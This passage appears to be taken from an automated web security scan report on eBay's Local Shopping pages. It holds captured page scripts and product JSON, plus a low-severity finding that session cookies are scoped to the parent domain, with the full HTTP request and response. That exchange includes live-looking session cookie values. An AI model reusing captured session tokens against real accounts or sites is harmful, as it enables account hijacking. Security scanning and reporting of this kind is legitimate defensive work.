   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[{"highPrice":null,"highPriceValue":null,"productId":6752788,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":3,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":2,"id":2,"name":"1-5","integer":2},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=6752788&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/009/042/474/200/9042506_11535474_200.jpg","lowPrice":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":3,"title":"Harry Potter and the Deathly Hallows: Part 1 (Xbox 360)","offerIds":"7806393","numLocalStore":1,"lowPriceValue":"$19.99","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 20.25px\"><\/span>\n<\/span><span class=\"revCnt\">(3)<\/span>"},{"highPrice":null,"highPriceValue":null,"productId":7313225,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":12,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":2,"id":2,"name":"1-5","integer":2},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=7313225&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/008/360/664/200/8360873_13227664_200.jpg","lowPrice":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":12,"title":"Game Party in Motion for Xbox 360 Kinect","offerIds":"8360873","numLocalStore":1,"lowPriceValue":"$19.99","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 20.25px\"><\/span>\n<\/span><span class=\"revCnt\">(12)<\/span>"}],"title":"","trkId":null,"localLandingLeftNavModel":null,"numOfResults":0,"topProducts":[{"highPrice":null,"highPriceValue":null,"productId":19694239,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=19694239&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/014/613/731/200/14613993_19403731_200.jpg","lowPrice":{"valueInMinorUnits":14999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":149990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Nespresso - Essenza Espresso Maker - Black","offerIds":"14613993","numLocalStore":1,"lowPriceValue":"$149.99","miloProductOfferModel":[{"merchantTitle":"Best Buy","merchantId":1779,"linkUrl":null,"location":{"merchantName":"Best Buy","latitude":32.931615,"merchantLogoUrl":"http://milo.com/images/stores/1779.jpg","longitude":-96.821136},"RTPalUrl":null,"price":{"valueInMinorUnits":14999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":149990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png"}],"ratingNode":null},{"highPrice":null,"highPriceValue":null,"productId":19582113,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=19582113&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/014/458/256/200/14458643_18843256_200.jpg","lowPrice":{"valueInMinorUnits":42999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":429990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Xbox 360 4GB Kinect Super Bundle","offerIds":"14458643","numLocalStore":1,"lowPriceValue":"$429.99","miloProductOfferModel":[{"merchantTitle":"Conn's","merchantId":13331,"linkUrl":null,"location":{"merchantName":"Conn's","latitude":32.68162,"merchantLogoUrl":"http://milo.com/images/stores/13331.jpg","longitude":-97.111413},"RTPalUrl":null,"price":{"valueInMinorUnits":42999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":429990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13331.png"}],"ratingNode":null}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":5,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac8a39cc-->

2.3. http://local.ebay.com/%22https:/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /%22https:/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%22https:/ HTTP/1.1
Referer: http://local.ebay.com/%22https://signin.ebay.com/ws/eBayISAPI.dll?SignIn%5C%22
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOAYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MnyBDM; nonsession=CgADKACBYa0OAYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MAywABTwVJCDEWKjCW
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac8a40bc
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: s=CgAD4ACBPBpOdYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2N/3kGY; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OdYWM4OWNmMzUxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1N2MAywABTwVJJTL96PuP; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:29 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 52359
Date: Thu, 05 Jan 2012 06:24:28 GMT
Cneonction: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325721178644" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325721178644;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AI9IFZhI*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="19245846" coords="32.858293,-96.749841,6911,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6911.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/107/956/200/14107204_20422956_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19245846&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='AEO Earbud Earmuffs'>AEO Earbud Earmuffs</a>
</div><div class="price"><span class="price">$14.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="8783898" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/009/910/307/200/9910147_12291307_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=8783898&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='PlayStation 3 160GB Killzone 3 Bundle for PlayStation 3'>PlayStation 3 160GB Killzone 3 Bundle for PlayStation 3</a>
